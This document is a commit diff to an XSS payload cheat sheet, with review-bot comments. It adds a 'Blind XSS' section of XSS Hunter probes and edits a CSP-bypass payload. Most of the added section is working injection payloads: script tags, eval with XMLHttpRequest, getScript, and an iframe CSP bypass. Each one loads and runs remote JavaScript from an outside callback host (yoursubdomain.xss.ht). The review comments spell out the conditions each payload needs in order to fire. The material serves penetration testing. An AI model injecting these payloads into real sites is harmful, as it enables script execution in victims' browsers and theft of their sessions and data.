Blind XSS - XSS Hunter, Sleepy Puppy etc

Swissky 2018-11-18 15:37:01 +01:00
parent fd99da6c06
commit a0f8e846fa


@ -7,6 +7,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in HTML/Applications](#xss-in-htmlapplications)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
- [Blind XSS](#blind-xss)
- [Polyglot XSS](#polyglot-xss) - [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [CSP Bypass](#csp-bypass) - [CSP Bypass](#csp-bypass)
@ -299,6 +300,31 @@ div {
</html> </html>
``` ```
## Blind XSS
### XSS Hunter
Available at [https://xsshunter.com/app](https://xsshunter.com/app)
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
```javascript
"><script src=//yoursubdomain.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
<script>$.getScript("//yoursubdomain.xss.ht")</script>
```
### Other tools for Blind XSS
- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy)
- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS)
- [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver)
- [ezXSS - ssl](https://github.com/ssl/ezXSS)
## Polyglot XSS ## Polyglot XSS
Polyglot XSS - 0xsobky Polyglot XSS - 0xsobky
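Review bot: the new `## Blind XSS` section lists four probe payloads without saying what each one assumes about the page it lands on, which is what a reader needs in order to pick one. `<script>$.getScript("//yoursubdomain.xss.ht")</script>` only works where jQuery is already loaded; the `XMLHttpRequest` + `eval(this.responseText)` variant only works if the probe host answers with a permissive `Access-Control-Allow-Origin` header, otherwise the browser blocks the response read and nothing fires; and the `javascript:eval(...)` line is a URI payload for `href`/wrapper contexts, not an attribute break-out like the first line. Suggest a one-line comment above each payload stating that context, plus a sentence under the heading defining blind XSS (the injected script executes somewhere the tester never sees, such as a back-office panel or log viewer, so an out-of-band callback service is the only way to learn it fired), since that is the reason the section exists. Two smaller points: the fence is tagged `javascript` while its first line is HTML and the CSP section below uses `js`, so pick one tag; and the quoted description has no link to where on xsshunter.com it comes from.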
@ -751,7 +777,7 @@ window.frames[0].document.head.appendChild(script);
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
```js ```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://swk.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
``` ```
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen) ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)
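Review bot: replacing the hard-coded `swk.xss.ht` with `yoursubdomain.xss.ht` in the Rhynorater payload is the right fix, since a reader copying the old line would have reported their finding to whoever owns that XSS Hunter subdomain instead of their own, and the new placeholder now matches the one used throughout the Blind XSS section. Because this hunk touches only a single occurrence, suggest searching the rest of the file for any remaining `xss.ht` hostname that is not the placeholder before merging.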